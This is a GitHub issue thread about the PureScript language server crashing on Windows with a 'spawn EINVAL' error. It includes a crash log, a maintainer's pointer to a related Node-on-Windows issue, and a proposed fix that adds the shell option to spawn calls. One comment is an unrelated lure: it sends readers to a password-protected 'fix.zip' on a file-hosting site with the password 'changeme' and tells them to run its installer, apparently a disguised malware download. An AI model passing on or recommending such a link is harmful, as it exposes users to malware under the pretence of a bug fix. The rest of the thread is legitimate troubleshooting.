### ISSUE TITLE
Connection to server got closed. Server will not be restarted.

### ISSUE THREAD

**Issue by Darthnerda** [nwolverson/purescript-language-server#205]
Whenever I boot up my vs code with the purescript language server extension, I get:

```
Only one folder in workspace, starting language server
Launching new language client for file:///d%3A/Code/trident
PureScript Language Server started (0.17.2)
Starting with args: ["C:\\Users\\joshb\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe","c:\\Users\\joshb\\.vscode\\extensions\\nwolverson.ide-purescript-0.26.2\\dist\\server.js","--node-ipc","--clientProcessId=22416"]
Starting with cwd: d:\Code\trident and using root path: d:\Code\trident
Activated lc for file:///d%3A/Code/trident
Got new config (client push)
[Info  - 10:50:03 PM] Going to start purs IDE server
[Info  - 10:50:03 PM] Using sources from psc-package/spago packages (PURS_IDE_SOURCES not set)
c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:35
```

... then here what looks like purescript transpiled to javascript (I think its my project and associated libraries) then ...

```
Error: spawn EINVAL
    at ChildProcess.spawn (node:internal/child_process:421:11)
    at spawn (node:child_process:799:9)
    at execFile (node:child_process:352:17)
    at t.<computed> (node:electron/js2c/node_init:2:2610)
    at c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:35:118375
    at c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:35:6097
    at c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:35:6101
    at c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:60:2629
    at wn (c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:35:34424)
    at _n (c:\Users\joshb\.vscode\extensions\nwolverson.ide-purescript-0.26.2\dist\server.js:35:36042) {
  errno: -4071,
  code: 'EINVAL',
  syscall: 'spawn'
}

Node.js v20.14.0
[Error - 10:50:03 PM] Connection to server got closed. Server will not be restarted.
```

Attempting to interact with the server in any way by running stop/disconnect, restart/reconnect, start/connect all end in:
```
Language client is not ready yet when handling workspace/executeCommand
```

When I first installed the extension everything worked great. One day it just stopped working. I've tried reinstalling the extension, vscode, installing specific versions of the extension, trying with a fresh purescript project, nothing improves the situation.

I'm on Windows 11.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nwolverson** [comment]
Same issue as here https://github.com/nwolverson/vscode-ide-purescript/issues/223

The node wrapper for purescript plus the node change plus windows = not working.

**Comment by wclr** [comment]
@nwolverson 

So far i'm on windows with node 21.7.3 got the errors. Updated psc-ide to the latest package-set (with new `ChildProcess` modules), and added `shell` param to all `spawn/execFile` calls in LS (In psc-ide I added shell param to `startServer/findBins` funcs). So this fixed the erros. 

If you don't have concens and suggestions on `shell` enabled everywhere in LS, I can make a PR.
